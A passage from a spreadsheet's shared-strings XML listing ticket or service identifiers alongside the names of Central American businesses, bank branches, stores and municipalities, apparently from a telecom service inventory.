    <t>F4543450</t>
  </si>
  <si>
    <t>F4543455</t>
  </si>
  <si>
    <t>F4543474</t>
  </si>
  <si>
    <t>F4543479</t>
  </si>
  <si>
    <t>F4543481</t>
  </si>
  <si>
    <t>F4543508</t>
  </si>
  <si>
    <t>F4543520</t>
  </si>
  <si>
    <t>F4543538</t>
  </si>
  <si>
    <t>F4543544</t>
  </si>
  <si>
    <t>F4543574</t>
  </si>
  <si>
    <t>F4543575</t>
  </si>
  <si>
    <t>F4543581</t>
  </si>
  <si>
    <t>F4543589</t>
  </si>
  <si>
    <t>F4543603</t>
  </si>
  <si>
    <t>F4543640</t>
  </si>
  <si>
    <t>F4543648</t>
  </si>
  <si>
    <t>F4543656</t>
  </si>
  <si>
    <t>F4543678</t>
  </si>
  <si>
    <t>F4543685</t>
  </si>
  <si>
    <t>F4543691</t>
  </si>
  <si>
    <t>F4543749</t>
  </si>
  <si>
    <t>F4543786</t>
  </si>
  <si>
    <t>F4543787</t>
  </si>
  <si>
    <t>F4543791</t>
  </si>
  <si>
    <t>F4543808</t>
  </si>
  <si>
    <t>F4543816</t>
  </si>
  <si>
    <t>F4543818</t>
  </si>
  <si>
    <t>F4543823</t>
  </si>
  <si>
    <t>F4543863</t>
  </si>
  <si>
    <t>F4543865</t>
  </si>
  <si>
    <t>F4543889</t>
  </si>
  <si>
    <t>F4543890</t>
  </si>
  <si>
    <t>F4543906</t>
  </si>
  <si>
    <t>F4543925</t>
  </si>
  <si>
    <t>F4543928</t>
  </si>
  <si>
    <t>F4543940</t>
  </si>
  <si>
    <t>F4543955</t>
  </si>
  <si>
    <t>F4543957</t>
  </si>
  <si>
    <t>F4543961</t>
  </si>
  <si>
    <t>F4543971</t>
  </si>
  <si>
    <t>F4543978</t>
  </si>
  <si>
    <t>F4543980</t>
  </si>
  <si>
    <t>F4543989</t>
  </si>
  <si>
    <t>F4543994</t>
  </si>
  <si>
    <t>F4543995</t>
  </si>
  <si>
    <t>F4543998</t>
  </si>
  <si>
    <t>F4544021</t>
  </si>
  <si>
    <t>F4544022</t>
  </si>
  <si>
    <t>F4544035</t>
  </si>
  <si>
    <t>F4544051</t>
  </si>
  <si>
    <t>F4544056</t>
  </si>
  <si>
    <t>F4544070</t>
  </si>
  <si>
    <t>F4544078</t>
  </si>
  <si>
    <t>F4544122</t>
  </si>
  <si>
    <t>F4544165</t>
  </si>
  <si>
    <t>F4544198</t>
  </si>
  <si>
    <t>F4544217</t>
  </si>
  <si>
    <t>F4544237</t>
  </si>
  <si>
    <t>F4544250</t>
  </si>
  <si>
    <t>F4544256</t>
  </si>
  <si>
    <t>F4544262</t>
  </si>
  <si>
    <t>F4544263</t>
  </si>
  <si>
    <t>F4544264</t>
  </si>
  <si>
    <t>F4544265</t>
  </si>
  <si>
    <t>F4544332</t>
  </si>
  <si>
    <t>F4544417</t>
  </si>
  <si>
    <t>F4544443</t>
  </si>
  <si>
    <t>F4544461</t>
  </si>
  <si>
    <t>F4544470</t>
  </si>
  <si>
    <t>F4544478</t>
  </si>
  <si>
    <t>F4544560</t>
  </si>
  <si>
    <t>F4544579</t>
  </si>
  <si>
    <t>F4544582</t>
  </si>
  <si>
    <t>F4544636</t>
  </si>
  <si>
    <t>F4544674</t>
  </si>
  <si>
    <t>F4544677</t>
  </si>
  <si>
    <t>F4544722</t>
  </si>
  <si>
    <t>F4544725</t>
  </si>
  <si>
    <t>F4544726</t>
  </si>
  <si>
    <t>F4544732</t>
  </si>
  <si>
    <t>F4544747</t>
  </si>
  <si>
    <t>F4544751</t>
  </si>
  <si>
    <t>F4544770</t>
  </si>
  <si>
    <t>F4544773</t>
  </si>
  <si>
    <t>F4544778</t>
  </si>
  <si>
    <t>F4544781</t>
  </si>
  <si>
    <t>F4544782</t>
  </si>
  <si>
    <t>F4544788</t>
  </si>
  <si>
    <t>F4544792</t>
  </si>
  <si>
    <t>F4544793</t>
  </si>
  <si>
    <t>F4544796</t>
  </si>
  <si>
    <t>F4544811</t>
  </si>
  <si>
    <t>F4544837</t>
  </si>
  <si>
    <t>F4544838</t>
  </si>
  <si>
    <t>F4544840</t>
  </si>
  <si>
    <t>F4544846</t>
  </si>
  <si>
    <t>F4544869</t>
  </si>
  <si>
    <t>F4544877</t>
  </si>
  <si>
    <t>F4544878</t>
  </si>
  <si>
    <t>F4544884</t>
  </si>
  <si>
    <t>F4544890</t>
  </si>
  <si>
    <t>F4544902</t>
  </si>
  <si>
    <t>F4544906</t>
  </si>
  <si>
    <t>F4544908</t>
  </si>
  <si>
    <t>F4544945</t>
  </si>
  <si>
    <t>F4544953</t>
  </si>
  <si>
    <t>F4545006</t>
  </si>
  <si>
    <t>F4545044</t>
  </si>
  <si>
    <t>F4545056</t>
  </si>
  <si>
    <t>F4545058</t>
  </si>
  <si>
    <t>F4545066</t>
  </si>
  <si>
    <t>F4545092</t>
  </si>
  <si>
    <t>F4545096</t>
  </si>
  <si>
    <t>F4545098</t>
  </si>
  <si>
    <t>F4545099</t>
  </si>
  <si>
    <t>F4545106</t>
  </si>
  <si>
    <t>F4545129</t>
  </si>
  <si>
    <t>F4545136</t>
  </si>
  <si>
    <t>F4545155</t>
  </si>
  <si>
    <t>F4545161</t>
  </si>
  <si>
    <t>F4545164</t>
  </si>
  <si>
    <t>F4545176</t>
  </si>
  <si>
    <t>F4545181</t>
  </si>
  <si>
    <t>F4545182</t>
  </si>
  <si>
    <t>F4545194</t>
  </si>
  <si>
    <t>F4545195</t>
  </si>
  <si>
    <t>F4545222</t>
  </si>
  <si>
    <t>F4545226</t>
  </si>
  <si>
    <t>F4545227</t>
  </si>
  <si>
    <t>F4545237</t>
  </si>
  <si>
    <t>F4545246</t>
  </si>
  <si>
    <t>F4545256</t>
  </si>
  <si>
    <t>F4545263</t>
  </si>
  <si>
    <t>F4545267</t>
  </si>
  <si>
    <t>F4545294</t>
  </si>
  <si>
    <t>F4545297</t>
  </si>
  <si>
    <t>F4545299</t>
  </si>
  <si>
    <t>F4545303</t>
  </si>
  <si>
    <t>F4545309</t>
  </si>
  <si>
    <t>F4545316</t>
  </si>
  <si>
    <t>F4545317</t>
  </si>
  <si>
    <t>F4545321</t>
  </si>
  <si>
    <t>F4545342</t>
  </si>
  <si>
    <t>F4545360</t>
  </si>
  <si>
    <t>F4545367</t>
  </si>
  <si>
    <t>F4545380</t>
  </si>
  <si>
    <t>F4545382</t>
  </si>
  <si>
    <t>F4545383</t>
  </si>
  <si>
    <t>F4545391</t>
  </si>
  <si>
    <t>F4545392</t>
  </si>
  <si>
    <t>F4545408</t>
  </si>
  <si>
    <t>F4545425</t>
  </si>
  <si>
    <t>F4545433</t>
  </si>
  <si>
    <t>F4545438</t>
  </si>
  <si>
    <t>F4545457</t>
  </si>
  <si>
    <t>F4545478</t>
  </si>
  <si>
    <t>F4545493</t>
  </si>
  <si>
    <t>F4545505</t>
  </si>
  <si>
    <t>F4545517</t>
  </si>
  <si>
    <t>F4545539</t>
  </si>
  <si>
    <t>F4545556</t>
  </si>
  <si>
    <t>F4545600</t>
  </si>
  <si>
    <t>F4545638</t>
  </si>
  <si>
    <t>F4545639</t>
  </si>
  <si>
    <t>F4545647</t>
  </si>
  <si>
    <t>F4545648</t>
  </si>
  <si>
    <t>F4545677</t>
  </si>
  <si>
    <t>F4545678</t>
  </si>
  <si>
    <t>F4545717</t>
  </si>
  <si>
    <t>F4545877</t>
  </si>
  <si>
    <t>F4545879</t>
  </si>
  <si>
    <t>F4545886</t>
  </si>
  <si>
    <t>F4545905</t>
  </si>
  <si>
    <t>F4545912</t>
  </si>
  <si>
    <t>F4545914</t>
  </si>
  <si>
    <t>F4545922</t>
  </si>
  <si>
    <t>F4545947</t>
  </si>
  <si>
    <t>F4545953</t>
  </si>
  <si>
    <t>F4545958</t>
  </si>
  <si>
    <t>F4545987</t>
  </si>
  <si>
    <t>F4545990</t>
  </si>
  <si>
    <t>F4546011</t>
  </si>
  <si>
    <t>F4546017</t>
  </si>
  <si>
    <t>F4546031</t>
  </si>
  <si>
    <t>F4546040</t>
  </si>
  <si>
    <t>F4546041</t>
  </si>
  <si>
    <t>F4546060</t>
  </si>
  <si>
    <t>F4546065</t>
  </si>
  <si>
    <t>F4546068</t>
  </si>
  <si>
    <t>F4546071</t>
  </si>
  <si>
    <t>F4546077</t>
  </si>
  <si>
    <t>F4546116</t>
  </si>
  <si>
    <t>F4546125</t>
  </si>
  <si>
    <t>F4546135</t>
  </si>
  <si>
    <t>F4546154</t>
  </si>
  <si>
    <t>F4546166</t>
  </si>
  <si>
    <t>F4546229</t>
  </si>
  <si>
    <t>F4546267</t>
  </si>
  <si>
    <t>F4546341</t>
  </si>
  <si>
    <t>F4546344</t>
  </si>
  <si>
    <t>F4546346</t>
  </si>
  <si>
    <t>F4546426</t>
  </si>
  <si>
    <t>F4546455</t>
  </si>
  <si>
    <t>F4546471</t>
  </si>
  <si>
    <t>F4546475</t>
  </si>
  <si>
    <t>F4546492</t>
  </si>
  <si>
    <t>F4546505</t>
  </si>
  <si>
    <t>F4546529</t>
  </si>
  <si>
    <t>F4212551</t>
  </si>
  <si>
    <t>8901489T</t>
  </si>
  <si>
    <t>F4540870</t>
  </si>
  <si>
    <t>FH3023</t>
  </si>
  <si>
    <t>F4497142</t>
  </si>
  <si>
    <t>4705661ON</t>
  </si>
  <si>
    <t>ON0002706039</t>
  </si>
  <si>
    <t>966400OH</t>
  </si>
  <si>
    <t>F4532552</t>
  </si>
  <si>
    <t>F4527739</t>
  </si>
  <si>
    <t>F4512284</t>
  </si>
  <si>
    <t>739717OH</t>
  </si>
  <si>
    <t>349400076T</t>
  </si>
  <si>
    <t>F4511787</t>
  </si>
  <si>
    <t>284500067T</t>
  </si>
  <si>
    <t>F4516227</t>
  </si>
  <si>
    <t>361700133T</t>
  </si>
  <si>
    <t>F4512439</t>
  </si>
  <si>
    <t>629400002T</t>
  </si>
  <si>
    <t>TECOLINES, S.A.</t>
  </si>
  <si>
    <t>F4484826</t>
  </si>
  <si>
    <t>F4494535</t>
  </si>
  <si>
    <t>F4487282</t>
  </si>
  <si>
    <t>F4497429</t>
  </si>
  <si>
    <t>F4493146</t>
  </si>
  <si>
    <t>F4542689</t>
  </si>
  <si>
    <t>859100003T</t>
  </si>
  <si>
    <t>ID1399005SV</t>
  </si>
  <si>
    <t>INDUSTRIAS MAGA?A L. S.A. DE C.V.</t>
  </si>
  <si>
    <t>891100004T</t>
  </si>
  <si>
    <t>F4495723</t>
  </si>
  <si>
    <t>727100113T</t>
  </si>
  <si>
    <t>1305937OH</t>
  </si>
  <si>
    <t>OH1000937324</t>
  </si>
  <si>
    <t>IP2053088SV</t>
  </si>
  <si>
    <t>F4501725</t>
  </si>
  <si>
    <t>F4504101</t>
  </si>
  <si>
    <t>F4509663</t>
  </si>
  <si>
    <t>265900389T</t>
  </si>
  <si>
    <t>FMT005J</t>
  </si>
  <si>
    <t>F4503052</t>
  </si>
  <si>
    <t>90001909951T</t>
  </si>
  <si>
    <t>25100200SV</t>
  </si>
  <si>
    <t>LANCASCO SALVADORENA S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4508859</t>
  </si>
  <si>
    <t>F4510867</t>
  </si>
  <si>
    <t>621683ON</t>
  </si>
  <si>
    <t>F4511838</t>
  </si>
  <si>
    <t>90001900740T</t>
  </si>
  <si>
    <t>F4511820</t>
  </si>
  <si>
    <t>917800001T</t>
  </si>
  <si>
    <t>F4512242</t>
  </si>
  <si>
    <t>F4511695</t>
  </si>
  <si>
    <t>F4511696</t>
  </si>
  <si>
    <t>349400115T</t>
  </si>
  <si>
    <t>F4509230</t>
  </si>
  <si>
    <t>F4510602</t>
  </si>
  <si>
    <t>F4511700</t>
  </si>
  <si>
    <t>CONTR0001196589OC</t>
  </si>
  <si>
    <t>F4511826</t>
  </si>
  <si>
    <t>364100006T</t>
  </si>
  <si>
    <t>1718243OH</t>
  </si>
  <si>
    <t>OH1001051398</t>
  </si>
  <si>
    <t>90001906337T</t>
  </si>
  <si>
    <t>F4508744</t>
  </si>
  <si>
    <t>F4512468</t>
  </si>
  <si>
    <t>F4510328</t>
  </si>
  <si>
    <t>F4511701</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM4459</t>
  </si>
  <si>
    <t>F4510745</t>
  </si>
  <si>
    <t>F4511637</t>
  </si>
  <si>
    <t>875695OH</t>
  </si>
  <si>
    <t>F4512246</t>
  </si>
  <si>
    <t>291800015T</t>
  </si>
  <si>
    <t>1325736OH</t>
  </si>
  <si>
    <t>FOMENTO A LA EDUCACION Y LA CULTURA</t>
  </si>
  <si>
    <t>536000001T</t>
  </si>
  <si>
    <t>SERVICIOS AGRICOLAS PROFESIONALES S.A.</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM4712</t>
  </si>
  <si>
    <t>F4512239</t>
  </si>
  <si>
    <t>F4512244</t>
  </si>
  <si>
    <t>F4512285</t>
  </si>
  <si>
    <t>5581189ON</t>
  </si>
  <si>
    <t>8901210T</t>
  </si>
  <si>
    <t>427100080T</t>
  </si>
  <si>
    <t>5390489ON</t>
  </si>
  <si>
    <t>ALCALDIA_MUNICIPAL_DE_WIWILI</t>
  </si>
  <si>
    <t>25219700SV</t>
  </si>
  <si>
    <t>INVERSIONES KYMA, S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4511910</t>
  </si>
  <si>
    <t>F4511882</t>
  </si>
  <si>
    <t>4255067ON</t>
  </si>
  <si>
    <t>F4512047</t>
  </si>
  <si>
    <t>720672</t>
  </si>
  <si>
    <t>F4505589</t>
  </si>
  <si>
    <t>38300654T</t>
  </si>
  <si>
    <t>29500011T</t>
  </si>
  <si>
    <t>F4511962</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0047</t>
  </si>
  <si>
    <t>F4504252</t>
  </si>
  <si>
    <t>245700190T</t>
  </si>
  <si>
    <t>F4511756</t>
  </si>
  <si>
    <t>24835300SV</t>
  </si>
  <si>
    <t>REGION DE SALUD OCCIDENTAL</t>
  </si>
  <si>
    <t>F4512249</t>
  </si>
  <si>
    <t>F4512250</t>
  </si>
  <si>
    <t>CC_GMG_GT_INTERNET_TIENDA_017</t>
  </si>
  <si>
    <t>F4512248</t>
  </si>
  <si>
    <t>F4512312</t>
  </si>
  <si>
    <t>F4512466</t>
  </si>
  <si>
    <t>595500002T</t>
  </si>
  <si>
    <t>ASKOLOR, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>CC_BANTRAB_GT_AGENCIA_163</t>
  </si>
  <si>
    <t>F4512369</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_4166</t>
  </si>
  <si>
    <t>25226900SV</t>
  </si>
  <si>
    <t>DIGA S.A DE C.V.</t>
  </si>
  <si>
    <t>F4510400</t>
  </si>
  <si>
    <t>F4513056</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_0102</t>
  </si>
  <si>
    <t>584300001T</t>
  </si>
  <si>
    <t>AEROBOTS, S.A.</t>
  </si>
  <si>
    <t>IP2053083SV</t>
  </si>
  <si>
    <t>F4507250</t>
  </si>
  <si>
    <t>F4512568</t>
  </si>
  <si>
    <t>F4510755</t>
  </si>
  <si>
    <t>4980321ON</t>
  </si>
  <si>
    <t>CC_POLLO_CAMPERO_GT_C669</t>
  </si>
  <si>
    <t>IP2145243SV</t>
  </si>
  <si>
    <t>23475600SV</t>
  </si>
  <si>
    <t>361700248T</t>
  </si>
  <si>
    <t>IP2071061SV</t>
  </si>
  <si>
    <t>47501867T</t>
  </si>
  <si>
    <t>915000002T</t>
  </si>
  <si>
    <t>COMPAÑIA INDUSTRIAL CORRUGADORA GUATEMALA,S.A.</t>
  </si>
  <si>
    <t>4292161ON</t>
  </si>
  <si>
    <t>ON0002563100/MZ TEXTIL COMERCIAL SA-</t>
  </si>
  <si>
    <t>F4510460</t>
  </si>
  <si>
    <t>F4511857</t>
  </si>
  <si>
    <t>90001911162T</t>
  </si>
  <si>
    <t>F4511982</t>
  </si>
  <si>
    <t>90001904835T</t>
  </si>
  <si>
    <t>F4510963</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_C006</t>
  </si>
  <si>
    <t>F4511858</t>
  </si>
  <si>
    <t>47503874T</t>
  </si>
  <si>
    <t>F4508136</t>
  </si>
  <si>
    <t>F4511604</t>
  </si>
  <si>
    <t>F4511587</t>
  </si>
  <si>
    <t>F4511592</t>
  </si>
  <si>
    <t>29500051T</t>
  </si>
  <si>
    <t>942100001T</t>
  </si>
  <si>
    <t>CRIAVES INCUBADORA,SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4511855</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0001</t>
  </si>
  <si>
    <t>F4511854</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_INTERNET_AGENCIA_1</t>
  </si>
  <si>
    <t>F4511856</t>
  </si>
  <si>
    <t>1393045OH</t>
  </si>
  <si>
    <t>CC_BANCO_AGRICOLA_SV_RAPICAJA_CAJAS_BOLSAS</t>
  </si>
  <si>
    <t>F4505395</t>
  </si>
  <si>
    <t>1207302OH</t>
  </si>
  <si>
    <t>877000013T</t>
  </si>
  <si>
    <t>F4511270</t>
  </si>
  <si>
    <t>F4504334</t>
  </si>
  <si>
    <t>90001909964T</t>
  </si>
  <si>
    <t>F4511713</t>
  </si>
  <si>
    <t>F4511659</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_50001</t>
  </si>
  <si>
    <t>1623504OH</t>
  </si>
  <si>
    <t>OH1001046409</t>
  </si>
  <si>
    <t>F4511775</t>
  </si>
  <si>
    <t>775500003T</t>
  </si>
  <si>
    <t>F4511780</t>
  </si>
  <si>
    <t>F4512228</t>
  </si>
  <si>
    <t>F4511861</t>
  </si>
  <si>
    <t>F4512787</t>
  </si>
  <si>
    <t>20559609</t>
  </si>
  <si>
    <t>F4502417</t>
  </si>
  <si>
    <t>20500018T</t>
  </si>
  <si>
    <t>781400017T</t>
  </si>
  <si>
    <t>290800016T</t>
  </si>
  <si>
    <t>F4506474</t>
  </si>
  <si>
    <t>F4506475</t>
  </si>
  <si>
    <t>ID1130026SV</t>
  </si>
  <si>
    <t>ADIMEX EL SALVADOR SPE, SA DE CV</t>
  </si>
  <si>
    <t>IP2035060SV</t>
  </si>
  <si>
    <t>FH3309</t>
  </si>
  <si>
    <t>CLARO  HONDURAS</t>
  </si>
  <si>
    <t>8901959T</t>
  </si>
  <si>
    <t>602031OH</t>
  </si>
  <si>
    <t>F4511073</t>
  </si>
  <si>
    <t>F4512398</t>
  </si>
  <si>
    <t>389900003T</t>
  </si>
  <si>
    <t>ANARG S.A.</t>
  </si>
  <si>
    <t>11400085T</t>
  </si>
  <si>
    <t>941000001T</t>
  </si>
  <si>
    <t>COLEGIO EVANGELICO ISRAEL</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_C640</t>
  </si>
  <si>
    <t>F4512088</t>
  </si>
  <si>
    <t>933962OH</t>
  </si>
  <si>
    <t>920300001T</t>
  </si>
  <si>
    <t>TERRESTRES CARBAY S.A.</t>
  </si>
  <si>
    <t>F4511722</t>
  </si>
  <si>
    <t>F4512161</t>
  </si>
  <si>
    <t>F4511724</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0391</t>
  </si>
  <si>
    <t>IPG003005SV</t>
  </si>
  <si>
    <t>F4511585</t>
  </si>
  <si>
    <t>F4510571</t>
  </si>
  <si>
    <t>F4511971</t>
  </si>
  <si>
    <t>47502952T</t>
  </si>
  <si>
    <t>F4512008</t>
  </si>
  <si>
    <t>42700501T</t>
  </si>
  <si>
    <t>597000001T</t>
  </si>
  <si>
    <t>PURATOS DE GUATEMALA, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>IPG000203SV</t>
  </si>
  <si>
    <t>F4512154</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_MORALES</t>
  </si>
  <si>
    <t>F4512155</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_INTERNET_TUNAYAC_MOMOSTENANGO</t>
  </si>
  <si>
    <t>F4512160</t>
  </si>
  <si>
    <t>F4512159</t>
  </si>
  <si>
    <t>47504295T</t>
  </si>
  <si>
    <t>F4512158</t>
  </si>
  <si>
    <t>F4512122</t>
  </si>
  <si>
    <t>F4517709</t>
  </si>
  <si>
    <t>47501864T</t>
  </si>
  <si>
    <t>4660864ON</t>
  </si>
  <si>
    <t>1377196OH</t>
  </si>
  <si>
    <t>4005679ON</t>
  </si>
  <si>
    <t>8200177T</t>
  </si>
  <si>
    <t>F4512013</t>
  </si>
  <si>
    <t>F4512014</t>
  </si>
  <si>
    <t>673000021T</t>
  </si>
  <si>
    <t>F4512015</t>
  </si>
  <si>
    <t>1673920OH</t>
  </si>
  <si>
    <t>1634623OH</t>
  </si>
  <si>
    <t>F4512752</t>
  </si>
  <si>
    <t>20514864</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_C656</t>
  </si>
  <si>
    <t>F4510689</t>
  </si>
  <si>
    <t>F4511619</t>
  </si>
  <si>
    <t>F4512473</t>
  </si>
  <si>
    <t>1454664OH</t>
  </si>
  <si>
    <t>1315676OH</t>
  </si>
  <si>
    <t>F4512226</t>
  </si>
  <si>
    <t>770600070T</t>
  </si>
  <si>
    <t>F4512221</t>
  </si>
  <si>
    <t>CC_BANTRAB_GT_AGENCIA_66</t>
  </si>
  <si>
    <t>F4512222</t>
  </si>
  <si>
    <t>CC_IMSA_GT_CENTRAL_PLANTA_ESCUINTLA</t>
  </si>
  <si>
    <t>628720OH</t>
  </si>
  <si>
    <t>F4512592</t>
  </si>
  <si>
    <t>F4512535</t>
  </si>
  <si>
    <t>F4512594</t>
  </si>
  <si>
    <t>54700051T</t>
  </si>
  <si>
    <t>F4512750</t>
  </si>
  <si>
    <t>20538260</t>
  </si>
  <si>
    <t>770600087T</t>
  </si>
  <si>
    <t>4606785ON</t>
  </si>
  <si>
    <t>F4501233</t>
  </si>
  <si>
    <t>1156220OH</t>
  </si>
  <si>
    <t>F4512062</t>
  </si>
  <si>
    <t>CONTR0002075128OC</t>
  </si>
  <si>
    <t>GRUPO EDUCATIVO CALPULI SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>ID1124098SV</t>
  </si>
  <si>
    <t>942100002T</t>
  </si>
  <si>
    <t>IDG000259SV</t>
  </si>
  <si>
    <t>AMERIJET EL SALVADOR S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4512167</t>
  </si>
  <si>
    <t>8902551T</t>
  </si>
  <si>
    <t>584700002T</t>
  </si>
  <si>
    <t>PROGRAMA MOSCAMED.</t>
  </si>
  <si>
    <t>90001909129T</t>
  </si>
  <si>
    <t>F4514029</t>
  </si>
  <si>
    <t>F4511598</t>
  </si>
  <si>
    <t>47501541T</t>
  </si>
  <si>
    <t>F4512406</t>
  </si>
  <si>
    <t>F4512405</t>
  </si>
  <si>
    <t>F4512582</t>
  </si>
  <si>
    <t>F4512581</t>
  </si>
  <si>
    <t>90001909830T</t>
  </si>
  <si>
    <t>F4512451</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0785</t>
  </si>
  <si>
    <t>797093OH</t>
  </si>
  <si>
    <t>OH1000604447/MOLSA HONDURAS S A DE C V  -</t>
  </si>
  <si>
    <t>F4512519</t>
  </si>
  <si>
    <t>F4512521</t>
  </si>
  <si>
    <t>F4512442</t>
  </si>
  <si>
    <t>F4512566</t>
  </si>
  <si>
    <t>F4512301</t>
  </si>
  <si>
    <t>F4512375</t>
  </si>
  <si>
    <t>F4512378</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC001053</t>
  </si>
  <si>
    <t>F4512528</t>
  </si>
  <si>
    <t>245700165T</t>
  </si>
  <si>
    <t>F4512605</t>
  </si>
  <si>
    <t>F4512753</t>
  </si>
  <si>
    <t>20538269</t>
  </si>
  <si>
    <t>F4509488</t>
  </si>
  <si>
    <t>ID1303002SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL DE LA REINA</t>
  </si>
  <si>
    <t>F4512556</t>
  </si>
  <si>
    <t>F4512069</t>
  </si>
  <si>
    <t>F4512235</t>
  </si>
  <si>
    <t>F4512166</t>
  </si>
  <si>
    <t>47503703T</t>
  </si>
  <si>
    <t>F4512173</t>
  </si>
  <si>
    <t>F4512218</t>
  </si>
  <si>
    <t>F4512328</t>
  </si>
  <si>
    <t>F4512383</t>
  </si>
  <si>
    <t>22978900SV</t>
  </si>
  <si>
    <t>. MOLINOS DE EL SALVADOR S.A. DE C.V.</t>
  </si>
  <si>
    <t>621997OH</t>
  </si>
  <si>
    <t>90001904411T</t>
  </si>
  <si>
    <t>F4512534</t>
  </si>
  <si>
    <t>F4505165</t>
  </si>
  <si>
    <t>F4512746</t>
  </si>
  <si>
    <t>F4512747</t>
  </si>
  <si>
    <t>20514843</t>
  </si>
  <si>
    <t>939800001T</t>
  </si>
  <si>
    <t>INTERNACIONAL DE MUDANZAS, S.A.</t>
  </si>
  <si>
    <t>F4512778</t>
  </si>
  <si>
    <t>20514867</t>
  </si>
  <si>
    <t>313900411T</t>
  </si>
  <si>
    <t>F4512779</t>
  </si>
  <si>
    <t>F4512792</t>
  </si>
  <si>
    <t>697400011T</t>
  </si>
  <si>
    <t>EMFAMA</t>
  </si>
  <si>
    <t>F4523323</t>
  </si>
  <si>
    <t>8900811T</t>
  </si>
  <si>
    <t>29500100T</t>
  </si>
  <si>
    <t>5115075ON</t>
  </si>
  <si>
    <t>ON0000481903/YESERA GUADALUPE S.A</t>
  </si>
  <si>
    <t>F4517714</t>
  </si>
  <si>
    <t>F4513053</t>
  </si>
  <si>
    <t>90001903754T</t>
  </si>
  <si>
    <t>863400096T</t>
  </si>
  <si>
    <t>F4520086</t>
  </si>
  <si>
    <t>F4525145</t>
  </si>
  <si>
    <t>592500001T</t>
  </si>
  <si>
    <t>AGROINDUSTRIAS SAN FRANCISCO DE GUATEMALA, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4525284</t>
  </si>
  <si>
    <t>F4525222</t>
  </si>
  <si>
    <t>F4525246</t>
  </si>
  <si>
    <t>F4525229</t>
  </si>
  <si>
    <t>F4525228</t>
  </si>
  <si>
    <t>F4525226</t>
  </si>
  <si>
    <t>ID1142031SV</t>
  </si>
  <si>
    <t>CAJA DE CRED.RURAL DE JOCORO</t>
  </si>
  <si>
    <t>IP2142070SV</t>
  </si>
  <si>
    <t>F4525406</t>
  </si>
  <si>
    <t>90001801173T</t>
  </si>
  <si>
    <t>266200003T</t>
  </si>
  <si>
    <t>SERCA S.A.</t>
  </si>
  <si>
    <t>829800065T</t>
  </si>
  <si>
    <t>F4525619</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0757</t>
  </si>
  <si>
    <t>F4525519</t>
  </si>
  <si>
    <t>47503691T</t>
  </si>
  <si>
    <t>F4525551</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_INTERNET_C659</t>
  </si>
  <si>
    <t>F4525550</t>
  </si>
  <si>
    <t>11500293T</t>
  </si>
  <si>
    <t>392100065T</t>
  </si>
  <si>
    <t>F4525751</t>
  </si>
  <si>
    <t>F4525749</t>
  </si>
  <si>
    <t>F4525752</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4314</t>
  </si>
  <si>
    <t>F4526034</t>
  </si>
  <si>
    <t>CC_FENACOAC_GT_18AV_Z3_QUETZALTENANGO</t>
  </si>
  <si>
    <t>1718180OH</t>
  </si>
  <si>
    <t>OH1000989478</t>
  </si>
  <si>
    <t>F4514748</t>
  </si>
  <si>
    <t>F4513214</t>
  </si>
  <si>
    <t>F4513203</t>
  </si>
  <si>
    <t>CC_CALLEJA_SV_SALA33</t>
  </si>
  <si>
    <t>F4513198</t>
  </si>
  <si>
    <t>F4514926</t>
  </si>
  <si>
    <t>F4514924</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_ASUNCION_MITA</t>
  </si>
  <si>
    <t>F4514929</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_COLOTENANGO</t>
  </si>
  <si>
    <t>F4516024</t>
  </si>
  <si>
    <t>427100172T</t>
  </si>
  <si>
    <t>1711519OH</t>
  </si>
  <si>
    <t>F4516020</t>
  </si>
  <si>
    <t>F4516019</t>
  </si>
  <si>
    <t>CC_GYT_GT_AGENCIA_576</t>
  </si>
  <si>
    <t>F4526388</t>
  </si>
  <si>
    <t>F4526409</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0245</t>
  </si>
  <si>
    <t>90001904766T</t>
  </si>
  <si>
    <t>344400220T</t>
  </si>
  <si>
    <t>F4526018</t>
  </si>
  <si>
    <t>CC_POLLO_CAMPERO_GT_INTERNET_C164</t>
  </si>
  <si>
    <t>F4513449</t>
  </si>
  <si>
    <t>26543800SV</t>
  </si>
  <si>
    <t>F4513555</t>
  </si>
  <si>
    <t>F4524623</t>
  </si>
  <si>
    <t>IP2046076SV</t>
  </si>
  <si>
    <t>22137300SV</t>
  </si>
  <si>
    <t>RENOVA AUTOS S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4524872</t>
  </si>
  <si>
    <t>F4525000</t>
  </si>
  <si>
    <t>CC_PRONE_GT_CC_INTERPLAZA_SUR_Z6_VILLA_NUEVA</t>
  </si>
  <si>
    <t>1710461OH</t>
  </si>
  <si>
    <t>OH1001073590</t>
  </si>
  <si>
    <t>F4517480</t>
  </si>
  <si>
    <t>264200002T</t>
  </si>
  <si>
    <t>GENERADORA ELECTRICA DEL NORTE LIMITADA</t>
  </si>
  <si>
    <t>F4524834</t>
  </si>
  <si>
    <t>F4518283</t>
  </si>
  <si>
